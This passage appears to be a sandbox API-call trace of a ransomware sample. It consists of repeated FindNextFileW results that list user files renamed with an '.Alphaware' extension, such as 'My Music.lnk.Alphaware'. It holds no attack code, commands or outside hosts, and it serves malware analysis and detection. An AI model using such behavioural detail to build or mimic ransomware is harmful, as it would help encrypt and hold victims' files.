FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce5b2220, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd12ec420, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8baaf2c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x12b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="e4W8iO-jmf.lnk.Alphaware", cAlternateFileName="E4W8IO~1.ALP")) returned 1 [0099.799] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd009fb00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd009fb00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bafb580, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EGL9Rx1KXSqWh.mkv.lnk.Alphaware", cAlternateFileName="EGL9RX~1.ALP")) returned 1 [0099.799] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xced48840, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd116f660, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bb47840, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x18b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUSZ.lnk.Alphaware", cAlternateFileName="EUSZLN~1.ALP")) returned 1 [0099.799] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd14db600, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14db600, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bb93b00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="gerLGhJ-J1Fq.lnk.Alphaware", cAlternateFileName="GERLGH~1.ALP")) returned 1 [0099.799] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0053840, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0053840, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bbdfdc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="grD5c_7rsX_r-Az.lnk.Alphaware", cAlternateFileName="GRD5C_~1.ALP")) returned 1 [0099.799] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0caca60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0caca60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bc2c080, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gV-dKx26kEi.pdf.lnk.Alphaware", cAlternateFileName="GV-DKX~1.ALP")) returned 1 [0099.799] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd160c100, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd160c100, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bc9e4a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd88, dwReserved0=0x0, dwReserved1=0x0, cFileName="GwoFAC.pdf.lnk.Alphaware", cAlternateFileName="GWOFAC~1.ALP")) returned 1 [0099.799] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd103eb60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd103eb60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bcea760, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Gym-mdc1iNSfM4mpMZh.swf.lnk.Alphaware", cAlternateFileName="GYM-MD~1.ALP")) returned 1 [0099.799] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1253ea0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1253ea0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bd108c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2148, dwReserved0=0x0, dwReserved1=0x0, cFileName="H-iXHNw3Q.lnk.Alphaware", cAlternateFileName="H-IXHN~1.ALP")) returned 1 [0099.799] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd16ca7e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16ca7e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bd5cb80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1534, dwReserved0=0x0, dwReserved1=0x0, cFileName="H8WEhqDt-nLLYwL7w3.lnk.Alphaware", cAlternateFileName="H8WEHQ~1.ALP")) returned 1 [0099.799] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd11bb920, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11bb920, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bda8e40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd74, dwReserved0=0x0, dwReserved1=0x0, cFileName="hoG8.lnk.Alphaware", cAlternateFileName="HOG8LN~1.ALP")) returned 1 [0099.799] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfbdcf00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfbdcf00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bdcefa0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd88, dwReserved0=0x0, dwReserved1=0x0, cFileName="hTjop.lnk.Alphaware", cAlternateFileName="HTJOPL~1.ALP")) returned 1 [0099.799] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce5fe4e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1716aa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bdf5100, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xce0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hWvMFQJJJ.lnk.Alphaware", cAlternateFileName="HWVMFQ~1.ALP")) returned 1 [0099.800] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf9edd20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf9edd20, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8be413c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2848, dwReserved0=0x0, dwReserved1=0x0, cFileName="IaDqH9.lnk.Alphaware", cAlternateFileName="IADQH9~1.ALP")) returned 1 [0099.800] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0f80480, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0f80480, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8be67520, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b20, dwReserved0=0x0, dwReserved1=0x0, cFileName="IdqAQbUtMr09oklG_Ot.lnk.Alphaware", cAlternateFileName="IDQAQB~1.ALP")) returned 1 [0099.800] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0007580, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0007580, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8beb37e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="IoUNPPwfOO3o6JZNAZ0x.lnk.Alphaware", cAlternateFileName="IOUNPP~1.ALP")) returned 1 [0099.800] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd10d70e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd10d70e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8beffaa0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1408, dwReserved0=0x0, dwReserved1=0x0, cFileName="iZ2B uOZ_oASw3v_9uGC.flv.lnk.Alphaware", cAlternateFileName="IZ2BUO~1.ALP")) returned 1 [0099.800] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfd7fe20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfd7fe20, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bf25c00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="j 99Z9MOpk.pdf.lnk.Alphaware", cAlternateFileName="J99Z9M~1.ALP")) returned 1 [0099.800] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15e5fa0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15e5fa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bf71ec0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x608, dwReserved0=0x0, dwReserved1=0x0, cFileName="JhfS93kCXhB0dS47UXO.swf.lnk.Alphaware", cAlternateFileName="JHFS93~1.ALP")) returned 1 [0099.800] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13386e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13386e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bfbe180, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1374, dwReserved0=0x0, dwReserved1=0x0, cFileName="jlPj6J.flv.lnk.Alphaware", cAlternateFileName="JLPJ6J~1.ALP")) returned 1 [0099.800] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1018a00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1018a00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8bfe42e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="JmY86mr.swf.lnk.Alphaware", cAlternateFileName="JMY86M~1.ALP")) returned 1 [0099.800] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13aab00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13aab00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c0305a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x388, dwReserved0=0x0, dwReserved1=0x0, cFileName="jNMMi.ots.lnk.Alphaware", cAlternateFileName="JNMMIO~1.ALP")) returned 1 [0099.800] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0d6b140, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0d6b140, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c056700, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jo7Fjz3qQw1.lnk.Alphaware", cAlternateFileName="JO7FJZ~1.ALP")) returned 1 [0099.800] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf740460, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13386e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c0c8b20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd08, dwReserved0=0x0, dwReserved1=0x0, cFileName="jvuGC2saBZF J.lnk.Alphaware", cAlternateFileName="JVUGC2~1.ALP")) returned 1 [0099.800] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd10fd240, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd10fd240, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c0eec80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="jvxZB--pZ8D4tDAf.lnk.Alphaware", cAlternateFileName="JVXZB-~1.ALP")) returned 1 [0099.800] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd14db600, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14db600, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c13af40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1aa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="k3 HQLaJEyY.lnk.Alphaware", cAlternateFileName="K3HQLA~1.ALP")) returned 1 [0099.800] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd135e840, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd135e840, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c1610a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kbuOLBA.swf.lnk.Alphaware", cAlternateFileName="KBUOLB~1.ALP")) returned 1 [0099.801] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1716aa0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1716aa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c1ad360, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1374, dwReserved0=0x0, dwReserved1=0x0, cFileName="kpu4EiFJZv7i.swf.lnk.Alphaware", cAlternateFileName="KPU4EI~1.ALP")) returned 1 [0099.801] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0c144e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0c144e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c1d34c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b34, dwReserved0=0x0, dwReserved1=0x0, cFileName="kxX8q7znVEV6F AiDQyX.lnk.Alphaware", cAlternateFileName="KXX8Q7~1.ALP")) returned 1 [0099.801] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf84ae00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf84ae00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c303fc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1448, dwReserved0=0x0, dwReserved1=0x0, cFileName="m66Nad.lnk.Alphaware", cAlternateFileName="M66NAD~1.ALP")) returned 1 [0099.801] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfc4f320, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfc4f320, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c3763e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1408, dwReserved0=0x0, dwReserved1=0x0, cFileName="MADiRK5BENdO7pHH.flv.lnk.Alphaware", cAlternateFileName="MADIRK~1.ALP")) returned 1 [0099.801] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1312580, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1312580, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c3e8800, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="miKlgwo4kuAJyz.lnk.Alphaware", cAlternateFileName="MIKLGW~1.ALP")) returned 1 [0099.801] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0fa65e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0fa65e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c4f31a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe08, dwReserved0=0x0, dwReserved1=0x0, cFileName="MKqMrJd2GayW Iyftd.ots.lnk.Alphaware", cAlternateFileName="MKQMRJ~1.ALP")) returned 1 [0099.801] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd12ec420, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd12ec420, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c5655c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1a74, dwReserved0=0x0, dwReserved1=0x0, cFileName="mlVaW3l8E0FMzi-R4q.lnk.Alphaware", cAlternateFileName="MLVAW3~1.ALP")) returned 1 [0099.801] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfb90c40, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb90c40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c5b1880, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x388, dwReserved0=0x0, dwReserved1=0x0, cFileName="mvpq.lnk.Alphaware", cAlternateFileName="MVPQLN~1.ALP")) returned 1 [0099.801] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfc03060, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfc03060, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c5fdb40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mxWMxpSlb1Z2y3xfhO0.swf.lnk.Alphaware", cAlternateFileName="MXWMXP~1.ALP")) returned 1 [0099.801] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce885c40, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd06df4c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c649e00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x774, dwReserved0=0x0, dwReserved1=0x0, cFileName="My Music.lnk.Alphaware", cAlternateFileName="MYMUSI~1.ALP")) returned 1 [0099.801] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0588860, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0a97720, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c6e2380, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x7a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My Pictures.lnk.Alphaware", cAlternateFileName="MYPICT~1.ALP")) returned 1 [0099.801] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfaac400, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1632260, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c7547a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x774, dwReserved0=0x0, dwReserved1=0x0, cFileName="My Videos.lnk.Alphaware", cAlternateFileName="MYVIDE~1.ALP")) returned 1 [0099.801] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1207be0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1207be0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c7a0a60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xda0, dwReserved0=0x0, dwReserved1=0x0, cFileName="No5ewLi.lnk.Alphaware", cAlternateFileName="NO5EWL~1.ALP")) returned 1 [0099.802] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd01f6760, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0ff28a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c812e80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1908, dwReserved0=0x0, dwReserved1=0x0, cFileName="NQCf5ew.lnk.Alphaware", cAlternateFileName="NQCF5E~1.ALP")) returned 1 [0099.802] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0a4b460, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd127a000, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c8852a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1960, dwReserved0=0x0, dwReserved1=0x0, cFileName="NqR9nQMJn0 I.lnk.Alphaware", cAlternateFileName="NQR9NQ~1.ALP")) returned 1 [0099.802] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf4468e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf4468e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c8d1560, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x608, dwReserved0=0x0, dwReserved1=0x0, cFileName="N_rlN0Z3nRhZqdxj JZI.lnk.Alphaware", cAlternateFileName="N_RLN0~1.ALP")) returned 1 [0099.802] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd11e1a80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11e1a80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c91d820, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe20, dwReserved0=0x0, dwReserved1=0x0, cFileName="O4VMeO_PmK30fk6.lnk.Alphaware", cAlternateFileName="O4VMEO~1.ALP")) returned 1 [0099.802] FindNextFileW (in: hFindFile=0xd8a310, 